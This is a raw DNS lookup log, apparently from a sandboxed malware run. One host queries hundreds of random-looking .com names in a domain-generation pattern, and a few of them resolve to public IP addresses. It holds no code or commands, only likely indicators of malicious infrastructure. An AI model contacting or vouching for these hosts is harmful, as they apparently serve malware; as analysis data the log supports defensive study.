Aug 23, 2024 18:47:44.099838972 CEST	1.1.1.1	192.168.2.4	0xadc6	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.099848986 CEST	1.1.1.1	192.168.2.4	0xb600	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.104453087 CEST	1.1.1.1	192.168.2.4	0x6dfc	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.104468107 CEST	1.1.1.1	192.168.2.4	0x9c8	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.118882895 CEST	1.1.1.1	192.168.2.4	0x8a4a	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.121835947 CEST	1.1.1.1	192.168.2.4	0xcd37	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.188319921 CEST	1.1.1.1	192.168.2.4	0xef15	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.197954893 CEST	1.1.1.1	192.168.2.4	0x1fe2	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.237602949 CEST	1.1.1.1	192.168.2.4	0x494d	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.237613916 CEST	1.1.1.1	192.168.2.4	0xeb14	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.241451025 CEST	1.1.1.1	192.168.2.4	0x6ad9	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.241451025 CEST	1.1.1.1	192.168.2.4	0x6ad9	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.241462946 CEST	1.1.1.1	192.168.2.4	0x7e02	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.241472006 CEST	1.1.1.1	192.168.2.4	0x5d43	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.245616913 CEST	1.1.1.1	192.168.2.4	0x105e	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.245628119 CEST	1.1.1.1	192.168.2.4	0x99e7	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.248733044 CEST	1.1.1.1	192.168.2.4	0x668a	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.248744011 CEST	1.1.1.1	192.168.2.4	0x7c0b	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.248753071 CEST	1.1.1.1	192.168.2.4	0x5cd7	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.250492096 CEST	1.1.1.1	192.168.2.4	0xeae8	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.250503063 CEST	1.1.1.1	192.168.2.4	0x7301	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.250511885 CEST	1.1.1.1	192.168.2.4	0x49ab	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.250526905 CEST	1.1.1.1	192.168.2.4	0xd3be	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.252305031 CEST	1.1.1.1	192.168.2.4	0xfdcf	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.260529995 CEST	1.1.1.1	192.168.2.4	0xad68	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.260529995 CEST	1.1.1.1	192.168.2.4	0xad68	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.262521982 CEST	1.1.1.1	192.168.2.4	0x4561	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.265252113 CEST	1.1.1.1	192.168.2.4	0xad2	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.272128105 CEST	1.1.1.1	192.168.2.4	0xc9c8	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.429379940 CEST	1.1.1.1	192.168.2.4	0xbe21	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.801368952 CEST	1.1.1.1	192.168.2.4	0x3791	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.801368952 CEST	1.1.1.1	192.168.2.4	0x3791	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.801368952 CEST	1.1.1.1	192.168.2.4	0x3791	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.801368952 CEST	1.1.1.1	192.168.2.4	0x3791	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.801368952 CEST	1.1.1.1	192.168.2.4	0x3791	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.801368952 CEST	1.1.1.1	192.168.2.4	0x3791	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.801368952 CEST	1.1.1.1	192.168.2.4	0x3791	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.801368952 CEST	1.1.1.1	192.168.2.4	0x3791	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:46.489918947 CEST	1.1.1.1	192.168.2.4	0x61b4	No error (0)	lygyvuj.com		52.34.198.229	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.340318918 CEST	1.1.1.1	192.168.2.4	0x5d0	Name error (3)	vofypam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.342050076 CEST	1.1.1.1	192.168.2.4	0xa2c	Name error (3)	qeqykyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.346520901 CEST	1.1.1.1	192.168.2.4	0x1c51	Name error (3)	lymyjyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.346535921 CEST	1.1.1.1	192.168.2.4	0x8dd7	Name error (3)	gadypah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.346545935 CEST	1.1.1.1	192.168.2.4	0x19de	Name error (3)	galyvuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.346554995 CEST	1.1.1.1	192.168.2.4	0x31d	Name error (3)	volybut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.346565008 CEST	1.1.1.1	192.168.2.4	0xbe72	Name error (3)	qedytoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.347894907 CEST	1.1.1.1	192.168.2.4	0x7617	Name error (3)	pupytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.347903967 CEST	1.1.1.1	192.168.2.4	0xebc1	Name error (3)	qekyvup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.347913027 CEST	1.1.1.1	192.168.2.4	0xa183	Name error (3)	vonyjef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.347923040 CEST	1.1.1.1	192.168.2.4	0xd23a	Name error (3)	ganyhab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.347933054 CEST	1.1.1.1	192.168.2.4	0x61ff	Name error (3)	lykyvyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.353128910 CEST	1.1.1.1	192.168.2.4	0xf83a	Name error (3)	vopyrik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.353138924 CEST	1.1.1.1	192.168.2.4	0x92d	Name error (3)	pujycyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.353147984 CEST	1.1.1.1	192.168.2.4	0x2d53	Name error (3)	qetyrul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.358262062 CEST	1.1.1.1	192.168.2.4	0x76ed	Name error (3)	gahyces.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.358277082 CEST	1.1.1.1	192.168.2.4	0xbb51	Name error (3)	vocygim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.358284950 CEST	1.1.1.1	192.168.2.4	0xbf1f	Name error (3)	lyxynir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.358294010 CEST	1.1.1.1	192.168.2.4	0x540d	Name error (3)	qegyxav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.359924078 CEST	1.1.1.1	192.168.2.4	0x2559	Name error (3)	qexyfuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.359935045 CEST	1.1.1.1	192.168.2.4	0xc7e2	Name error (3)	gacyfih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.359944105 CEST	1.1.1.1	192.168.2.4	0x6ac1	Name error (3)	vowyqyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.359952927 CEST	1.1.1.1	192.168.2.4	0xc924	Name error (3)	vofyzof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.365668058 CEST	1.1.1.1	192.168.2.4	0x630	Name error (3)	pufyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.365679026 CEST	1.1.1.1	192.168.2.4	0x4dd4	Name error (3)	gaqyqez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366488934 CEST	1.1.1.1	192.168.2.4	0x45c0	Name error (3)	lyxyfuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366498947 CEST	1.1.1.1	192.168.2.4	0x2beb	Name error (3)	qeqyqep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366508007 CEST	1.1.1.1	192.168.2.4	0xf90f	Name error (3)	gadyzib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366517067 CEST	1.1.1.1	192.168.2.4	0xaf6a	Name error (3)	volydyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366527081 CEST	1.1.1.1	192.168.2.4	0x723e	Name error (3)	pumymap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366538048 CEST	1.1.1.1	192.168.2.4	0x7105	Name error (3)	qedylig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366547108 CEST	1.1.1.1	192.168.2.4	0xc276	Name error (3)	vonymoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366556883 CEST	1.1.1.1	192.168.2.4	0xe279	Name error (3)	galydyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366565943 CEST	1.1.1.1	192.168.2.4	0xcb9c	Name error (3)	lykyser.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366575003 CEST	1.1.1.1	192.168.2.4	0x9680	Name error (3)	lysylun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366590023 CEST	1.1.1.1	192.168.2.4	0x4371	Name error (3)	ganynos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366600990 CEST	1.1.1.1	192.168.2.4	0xdff3	Name error (3)	lysytoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366610050 CEST	1.1.1.1	192.168.2.4	0x67e2	Name error (3)	pumyjev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.366619110 CEST	1.1.1.1	192.168.2.4	0x35ba	Name error (3)	pujypal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.371542931 CEST	1.1.1.1	192.168.2.4	0x9521	Name error (3)	vopykum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.371553898 CEST	1.1.1.1	192.168.2.4	0x914f	Name error (3)	puzybil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.371562958 CEST	1.1.1.1	192.168.2.4	0xa81b	Name error (3)	lyvynid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.371572971 CEST	1.1.1.1	192.168.2.4	0x32b2	Name error (3)	qetykyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.371581078 CEST	1.1.1.1	192.168.2.4	0x8295	Name error (3)	gatykyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.371589899 CEST	1.1.1.1	192.168.2.4	0xa669	Name error (3)	qebyhag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.371598959 CEST	1.1.1.1	192.168.2.4	0xe346	Name error (3)	lyryjej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.371608973 CEST	1.1.1.1	192.168.2.4	0xde1f	Name error (3)	lyvygon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.371617079 CEST	1.1.1.1	192.168.2.4	0x8c5e	Name error (3)	puryjeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.371625900 CEST	1.1.1.1	192.168.2.4	0x39ef	Name error (3)	qegytop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.377857924 CEST	1.1.1.1	192.168.2.4	0x23df	Name error (3)	gatyruw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.377880096 CEST	1.1.1.1	192.168.2.4	0xc6a3	Name error (3)	vojycec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.377888918 CEST	1.1.1.1	192.168.2.4	0x4b5a	Name error (3)	lyrywur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.377897978 CEST	1.1.1.1	192.168.2.4	0xc5a0	Name error (3)	puvygog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.384695053 CEST	1.1.1.1	192.168.2.4	0x5976	Name error (3)	purywyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.384726048 CEST	1.1.1.1	192.168.2.4	0x935	Name error (3)	puzyduq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.384737968 CEST	1.1.1.1	192.168.2.4	0xceae	Name error (3)	lygyxad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.385787964 CEST	1.1.1.1	192.168.2.4	0xc58c	Name error (3)	qekysel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.390038013 CEST	1.1.1.1	192.168.2.4	0xd36d	Name error (3)	qebyniv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.390053034 CEST	1.1.1.1	192.168.2.4	0xceaf	Name error (3)	puvybuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.390063047 CEST	1.1.1.1	192.168.2.4	0x352c	Name error (3)	pupylug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.390072107 CEST	1.1.1.1	192.168.2.4	0xed1c	Name error (3)	gahypoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.390081882 CEST	1.1.1.1	192.168.2.4	0x9311	Name error (3)	vocybuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.391998053 CEST	1.1.1.1	192.168.2.4	0x1d0b	Name error (3)	vojypat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.710032940 CEST	1.1.1.1	192.168.2.4	0xb51c	Name error (3)	gacyvub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.710122108 CEST	1.1.1.1	192.168.2.4	0x8d56	Name error (3)	vowyjak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.710133076 CEST	1.1.1.1	192.168.2.4	0x6315	Name error (3)	pufytip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.713558912 CEST	1.1.1.1	192.168.2.4	0x204f	Name error (3)	qexyvyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.715883970 CEST	1.1.1.1	192.168.2.4	0x8ec5	Name error (3)	qeqyhol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.715894938 CEST	1.1.1.1	192.168.2.4	0xdd6e	Name error (3)	vonygit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.717175007 CEST	1.1.1.1	192.168.2.4	0x7325	Name error (3)	volycem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.717185974 CEST	1.1.1.1	192.168.2.4	0x81	Name error (3)	qekyxaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.721251965 CEST	1.1.1.1	192.168.2.4	0xa08e	Name error (3)	vopyqef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.724081993 CEST	1.1.1.1	192.168.2.4	0x3c8a	Name error (3)	gatyqeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.724487066 CEST	1.1.1.1	192.168.2.4	0x35e5	Name error (3)	qebyfup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.726404905 CEST	1.1.1.1	192.168.2.4	0x287c	Name error (3)	pujyxoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.726416111 CEST	1.1.1.1	192.168.2.4	0x96fe	Name error (3)	lyvyfux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.726424932 CEST	1.1.1.1	192.168.2.4	0xb120	Name error (3)	vojyzik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.726434946 CEST	1.1.1.1	192.168.2.4	0xb44b	Name error (3)	puvydyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.729675055 CEST	1.1.1.1	192.168.2.4	0xbe85	Name error (3)	qegylul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.729686022 CEST	1.1.1.1	192.168.2.4	0xd299	Name error (3)	purymog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.729695082 CEST	1.1.1.1	192.168.2.4	0xb73	Name error (3)	gaqynih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.729705095 CEST	1.1.1.1	192.168.2.4	0x79ce	Name error (3)	vofykyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.729716063 CEST	1.1.1.1	192.168.2.4	0xd504	Name error (3)	vowymom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.730204105 CEST	1.1.1.1	192.168.2.4	0x2721	Name error (3)	lygytix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.730221033 CEST	1.1.1.1	192.168.2.4	0xefa4	Name error (3)	qeqyniq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.730262995 CEST	1.1.1.1	192.168.2.4	0xf6ed	Name error (3)	lymynuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.732884884 CEST	1.1.1.1	192.168.2.4	0xf5c8	Name error (3)	volypof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.732896090 CEST	1.1.1.1	192.168.2.4	0x1bac	Name error (3)	pumybuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.737010956 CEST	1.1.1.1	192.168.2.4	0x58e0	Name error (3)	galypob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.738533020 CEST	1.1.1.1	192.168.2.4	0xc3a4	Name error (3)	pupyjap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.738543987 CEST	1.1.1.1	192.168.2.4	0x3206	Name error (3)	lysyjex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739104033 CEST	1.1.1.1	192.168.2.4	0xeae8	Name error (3)	vonybuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739114046 CEST	1.1.1.1	192.168.2.4	0xb3e0	Name error (3)	qekytig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739715099 CEST	1.1.1.1	192.168.2.4	0x148a	Name error (3)	qedyruv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739726067 CEST	1.1.1.1	192.168.2.4	0x9d66	Name error (3)	gatyhos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739734888 CEST	1.1.1.1	192.168.2.4	0x9936	Name error (3)	lyvyver.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739744902 CEST	1.1.1.1	192.168.2.4	0xdd99	Name error (3)	lysywyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739753962 CEST	1.1.1.1	192.168.2.4	0xe973	Name error (3)	vojyrum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739763021 CEST	1.1.1.1	192.168.2.4	0xba0b	Name error (3)	qetyhov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739772081 CEST	1.1.1.1	192.168.2.4	0xef58	Name error (3)	gadyrus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739780903 CEST	1.1.1.1	192.168.2.4	0xd534	Name error (3)	pujytug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739789009 CEST	1.1.1.1	192.168.2.4	0xc6f9	Name error (3)	gaqyhaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739799023 CEST	1.1.1.1	192.168.2.4	0xf8c	Name error (3)	pupywyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739809036 CEST	1.1.1.1	192.168.2.4	0xbf65	Name error (3)	lyxyvyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739820004 CEST	1.1.1.1	192.168.2.4	0x9bbb	Name error (3)	qedykep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.739829063 CEST	1.1.1.1	192.168.2.4	0xd87b	Name error (3)	ganyfuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.740652084 CEST	1.1.1.1	192.168.2.4	0x60e2	Name error (3)	pumygil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.740662098 CEST	1.1.1.1	192.168.2.4	0xd348	Name error (3)	vofyruc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.740931034 CEST	1.1.1.1	192.168.2.4	0xdb1e	Name error (3)	puzyceg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.740941048 CEST	1.1.1.1	192.168.2.4	0xcb0c	Name error (3)	lykyxoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.740950108 CEST	1.1.1.1	192.168.2.4	0xa753	Name error (3)	lymygor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.741605043 CEST	1.1.1.1	192.168.2.4	0xb953	Name error (3)	qebyvyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.741615057 CEST	1.1.1.1	192.168.2.4	0x8e0c	Name error (3)	galycah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.741622925 CEST	1.1.1.1	192.168.2.4	0xce61	Name error (3)	qetyqag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.741631985 CEST	1.1.1.1	192.168.2.4	0x7f22	Name error (3)	lyryman.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.741641045 CEST	1.1.1.1	192.168.2.4	0x6842	Name error (3)	gahyziw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.741655111 CEST	1.1.1.1	192.168.2.4	0x3595	Name error (3)	lygylur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.742276907 CEST	1.1.1.1	192.168.2.4	0x7857	Name error (3)	vocydyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.742288113 CEST	1.1.1.1	192.168.2.4	0x3833	Name error (3)	gacydes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.742296934 CEST	1.1.1.1	192.168.2.4	0xaba0	Name error (3)	pufylul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.743551016 CEST	1.1.1.1	192.168.2.4	0x6013	Name error (3)	qexysev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.744146109 CEST	1.1.1.1	192.168.2.4	0xd04e	Name error (3)	puzypav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.746568918 CEST	1.1.1.1	192.168.2.4	0x25e4	Name error (3)	gadykyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.747986078 CEST	1.1.1.1	192.168.2.4	0x41dd	Name error (3)	lyxysad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.752614021 CEST	1.1.1.1	192.168.2.4	0x5568	Name error (3)	lykytin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.760152102 CEST	1.1.1.1	192.168.2.4	0x2a94	Name error (3)	ganyvyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.760487080 CEST	1.1.1.1	192.168.2.4	0x3762	Name error (3)	vopyjac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.777024984 CEST	1.1.1.1	192.168.2.4	0x5628	Name error (3)	puvycel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.777120113 CEST	1.1.1.1	192.168.2.4	0xaac2	Name error (3)	lyrygid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.777129889 CEST	1.1.1.1	192.168.2.4	0xf53f	Name error (3)	gahyruh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.779695034 CEST	1.1.1.1	192.168.2.4	0xd995	Name error (3)	qexyxop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.779921055 CEST	1.1.1.1	192.168.2.4	0x9139	Name error (3)	gacycaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.780092001 CEST	1.1.1.1	192.168.2.4	0xa28	Name error (3)	vowyguf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.780105114 CEST	1.1.1.1	192.168.2.4	0xb92e	Name error (3)	vocycat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.780544996 CEST	1.1.1.1	192.168.2.4	0x7ed7	Name error (3)	vofyqek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.780885935 CEST	1.1.1.1	192.168.2.4	0x9ee3	Name error (3)	pufyweq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.782561064 CEST	1.1.1.1	192.168.2.4	0x99b5	Name error (3)	lyxyxox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.782720089 CEST	1.1.1.1	192.168.2.4	0x5ccb	Name error (3)	puzyxip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.783157110 CEST	1.1.1.1	192.168.2.4	0xc48a	Name error (3)	qeqyfug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.784053087 CEST	1.1.1.1	192.168.2.4	0xc748	Name error (3)	gadyqaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.784348965 CEST	1.1.1.1	192.168.2.4	0x9c1f	Name error (3)	lymyfyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.784363985 CEST	1.1.1.1	192.168.2.4	0xac58	Name error (3)	volyzic.com	none	none	A (IP address)	IN (0x0001)	false
